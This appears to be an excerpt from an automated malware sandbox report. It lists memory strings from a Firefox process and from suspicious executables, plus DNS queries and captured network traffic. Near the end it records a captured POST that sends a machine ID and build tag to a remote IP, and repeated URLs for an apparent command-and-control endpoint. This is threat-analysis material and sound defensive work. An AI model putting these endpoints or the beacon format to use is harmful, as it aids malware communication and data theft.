Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: browser-delayed-startup-finishedtoolkit.singletonWindowTypehttps://www.youtube.com/account_shouldViewDownloadInternally/<toolkit.defaultChromeFeatures equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools-commandkey-javascript-tracing-toggledevtools.debugger.remote-websocketdevtools.performance.recording.ui-base-url{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:No callback set for this channel.browser.fixup.dns_first_for_single_words@mozilla.org/uriloader/handler-service;1releaseDistinctSystemPrincipalLoaderand deploy previews URLs are allowed.devtools/client/framework/devtoolsDevToolsStartup.jsm:handleDebuggerFlagdevtools-commandkey-profiler-start-stopUnable to start devtools server on devtools.debugger.features.javascript-tracingJSON Viewer's onSave failed in startPersistenceWebChannel/this._originCheckCallbackresource://devtools/shared/security/socket.jsDevTools telemetry entry point failed: @mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=filebrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools/client/framework/devtools-browserhttps://poczta.interia.pl/mh/?mailto=%s^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsScheme should be either http or httpsget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUP{33d75835-722f-42c0-89cc-44f328e56a86}extractScheme/fixupChangedProtocol<https://mail.inbox.lv/compose?to=%s_injectDefaultProtocolHandlersIfNeeded^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?browser.fixup.domainsuffixwhitelist.get FIXUP_FLAGS_MAKE_ALTERNATE_URIisDownloadsImprovementsAlreadyMigratedhttps://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAG_FORCE_ALTERNATE_URICan't invoke URIFixup in the content processresource://gre/modules/JSONFile.sys.mjshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs^([a-z+.-]+:\/{0,3})*([^\/@]+@).+@mozilla.org/uriloader/local-handler-app;1http://www.inbox.lv/rfc2368/?value=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}gecko.handlerService.defaultHandlersVersionhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callback@mozilla.org/network/file-input-stream;1@mozilla.org/network/simple-stream-listener;1newChannel requires a single object argument_finalizeInternal/this._finalizePromise<SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1resource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/network/input-stream-pump;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yandex.ru/compose?mailto=%sresource://gre/modules/DeferredTask.sys.mjshttps://mail.inbox.lv/compose?to=%s equals www.yaho
Source: 8e8f4571c5.exe, 00000018.00000002.3383993209.0000000006A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: get MozTransitionTimingFunctionget MozTransitionDurationget contain-intrinsic-sizeget -webkit-mask-positionget -moz-perspective-originget -webkit-border-radiusset contain-intrinsic-sizeset -moz-backface-visibilityset MozFontFeatureSettings-moz-font-language-overrideset -moz-transition-durationset -moz-perspective-originset -webkit-border-radiusget MozBackfaceVisibilityset MozBackfaceVisibilityget -moz-backface-visibilityget -moz-transform-originset -moz-transform-originget -moz-font-feature-settingsget scroll-padding-inlineget MozFontFeatureSettingsset -moz-font-feature-settingsget MozFontLanguageOverride-moz-font-feature-settingsget -moz-font-language-overrideset -moz-font-language-overrideset MozTransitionDurationget -moz-transition-durationMozTransitionTimingFunctionset MozFontLanguageOverrideset scroll-padding-inlineset -webkit-mask-positionget MozTransitionPropertyget -moz-transition-propertyget -moz-transition-delayset -moz-animation-durationset MozAnimationTimingFunctionset MozTransitionPropertyset -moz-transition-propertyMozAnimationTimingFunctionget -moz-animation-direction-moz-animation-play-stateMozAnimationIterationCountset -moz-animation-direction-moz-animation-iteration-countget -moz-animation-play-stateset MozAnimationIterationCountget MozAnimationPlayStateset -moz-transition-delayset -moz-animation-play-stateget -moz-animation-fill-modeset -moz-animation-fill-modeset MozTransitionTimingFunctionget MozAnimationTimingFunctionget -moz-animation-duration-moz-animation-timing-functionget MozAnimationIterationCount-moz-transition-timing-functionset MozAnimationDirectionset MozAnimationPlayState--lwt-accent-color-inactiveget MozAnimationDirection--lwt-background-alignmenttoolbar_vertical_separatorhttps://www.youtube.com/accounttipShownCount.searchTip_onboard equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3000161016.000001B1177A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2994122055.000001B116B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 00000018.00000002.3357621046.00000000024C1000.00000004.00000020.00020000.00000000.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3374507339.0000000005388000.00000004.00000020.00020000.00000000.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3355266033.0000000002478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account[ equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 0000001C.00000002.3374507339.0000000005388000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountr equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 0000001C.00000002.3374507339.0000000005388000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account~ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2901986639.0000018A479AD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2903172052.0000018A479B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 00000018.00000002.3381980808.00000000069AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: vwww.youtube.com/account equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 00000018.00000002.3381980808.00000000069AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: vwww.youtube.com/accounte equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2987356094.000001B11659D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2988472196.000001B116624000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.3000161016.000001B1177D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2994122055.000001B116B9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comappmenuitem-zoom equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3015576756.000001B11D485000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comtype equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2987356094.000001B1165BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B117583000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989528701.000001B116803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B1175D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xO^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B1175D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964737783.000001B111A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xtlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: unknown HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 32 35 45 38 39 44 38 30 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="hwid"B125E89D806E2371543510------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build"sila------HCAEHJJKFCAAFHJKFBKK--
Source: firefox.exe, 0000001F.00000002.2953298471.000001B10486B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967893682.000001B112B44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/15.113.16/
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php%
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php0wk
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpLw
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpMt$
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpNu%
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcw
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
